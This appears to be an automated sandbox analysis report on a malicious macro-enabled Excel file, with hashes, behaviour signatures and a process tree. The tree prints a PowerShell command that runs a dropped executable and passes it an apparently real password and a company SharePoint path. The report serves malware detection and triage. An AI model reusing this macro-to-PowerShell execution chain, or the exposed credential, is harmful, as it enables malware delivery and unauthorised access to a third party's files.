Overview

overview

10

Static

static

8

6e4513d1bc...9.xlsm

windows7_x64

10

6e4513d1bc...9.xlsm

windows10-2004_x64

10

Analysis

  • max time kernel
    4294212s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20220310-en
  • submitted
    29-03-2022 23:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6e4513d1bc45644004b84e3a4bfc027b428bea3484ceaaa7489778fa9f7a88c9.xlsm

  • Size

    1.6MB

  • MD5

    d9c0d4a7bbb8ec67b195daa158f04f5f

  • SHA1

    ffcfeca98f3aeb343bba753cd3d84f1770b7665e

  • SHA256

    6e4513d1bc45644004b84e3a4bfc027b428bea3484ceaaa7489778fa9f7a88c9

  • SHA512

    421f6ddda2c26ba8434cde9a9c8337b8dc88c3d8be378b0f56d1f9bb8ef3e675e3f4b2a8a03f5f6df6dd2b039a0beed1791a1e8c5c35adb7c926b433d597f228

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\6e4513d1bc45644004b84e3a4bfc027b428bea3484ceaaa7489778fa9f7a88c9.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1636
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "& ($env:TEMP + \"\SPD.exe\") \"[email protected]\" \"Nhh2H5urwHv0\" \"https://finansco.sharepoint.com/Delte dokumenter/Finansco Gruppen Fellesmappe/Modellporteføljer/\" \"Produktark MPF Kopi.xlsx\""
        2⤵
        • Process spawned unexpected child process
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Users\Admin\AppData\Local\Temp\SPD.exe
          "C:\Users\Admin\AppData\Local\Temp\SPD.exe" [email protected] Nhh2H5urwHv0 "https://finansco.sharepoint.com/Delte dokumenter/Finansco Gruppen Fellesmappe/Modellporteføljer/" "Produktark MPF Kopi.xlsx"
          3⤵
          • Executes dropped EXE
          PID:836

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\SPD.exe
      Filesize

      288KB

      MD5

      9c478210112e070de0a90944850a774b

      SHA1

      a63608beeb2a4ef2b0ca284d0360776493e2abf7

      SHA256

      9a305116bdb925cd20126f7ee3cc07174ca90bf558cf5e72665093297695bcd6

      SHA512

      bacab26d6dc7a9d23f8ba7035f0a02030181c33abf86be9f6d99e2d4ab61bc5371ce78d61deece96e196300df9fb22eb98e7c7e470c4b1225206a9fa9bffbf8a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\SPD.exe
      Filesize

      288KB

      MD5

      9c478210112e070de0a90944850a774b

      SHA1

      a63608beeb2a4ef2b0ca284d0360776493e2abf7

      SHA256

      9a305116bdb925cd20126f7ee3cc07174ca90bf558cf5e72665093297695bcd6

      SHA512

      bacab26d6dc7a9d23f8ba7035f0a02030181c33abf86be9f6d99e2d4ab61bc5371ce78d61deece96e196300df9fb22eb98e7c7e470c4b1225206a9fa9bffbf8a

      Download Submit

    • \Users\Admin\AppData\Local\Temp\SPD.exe
      Filesize

      288KB

      MD5

      9c478210112e070de0a90944850a774b

      SHA1

      a63608beeb2a4ef2b0ca284d0360776493e2abf7

      SHA256

      9a305116bdb925cd20126f7ee3cc07174ca90bf558cf5e72665093297695bcd6

      SHA512

      bacab26d6dc7a9d23f8ba7035f0a02030181c33abf86be9f6d99e2d4ab61bc5371ce78d61deece96e196300df9fb22eb98e7c7e470c4b1225206a9fa9bffbf8a

      Download Submit

    • \Users\Admin\AppData\Local\Temp\SPD.exe
      Filesize

      288KB

      MD5

      9c478210112e070de0a90944850a774b

      SHA1

      a63608beeb2a4ef2b0ca284d0360776493e2abf7

      SHA256

      9a305116bdb925cd20126f7ee3cc07174ca90bf558cf5e72665093297695bcd6

      SHA512

      bacab26d6dc7a9d23f8ba7035f0a02030181c33abf86be9f6d99e2d4ab61bc5371ce78d61deece96e196300df9fb22eb98e7c7e470c4b1225206a9fa9bffbf8a

      Download Submit

    • \Users\Admin\AppData\Local\Temp\SPD.exe
      Filesize

      288KB

      MD5

      9c478210112e070de0a90944850a774b

      SHA1

      a63608beeb2a4ef2b0ca284d0360776493e2abf7

      SHA256

      9a305116bdb925cd20126f7ee3cc07174ca90bf558cf5e72665093297695bcd6

      SHA512

      bacab26d6dc7a9d23f8ba7035f0a02030181c33abf86be9f6d99e2d4ab61bc5371ce78d61deece96e196300df9fb22eb98e7c7e470c4b1225206a9fa9bffbf8a

      Download Submit

    • memory/1616-62-0x0000000075041000-0x0000000075043000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1616-63-0x0000000069850000-0x0000000069DFB000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1616-64-0x0000000000682000-0x0000000000684000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1616-65-0x0000000002420000-0x0000000002463000-memory.dmp

      Filesize

      268KB

      Download

    • memory/1636-59-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1996-54-0x000000002F651000-0x000000002F654000-memory.dmp

      Filesize

      12KB

      Download

    • memory/1996-60-0x0000000004480000-0x00000000045DC000-memory.dmp

      Filesize

      1.4MB

      Download

    • memory/1996-57-0x000000007203D000-0x0000000072048000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1996-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1996-55-0x0000000071051000-0x0000000071053000-memory.dmp

      Filesize

      8KB

      Download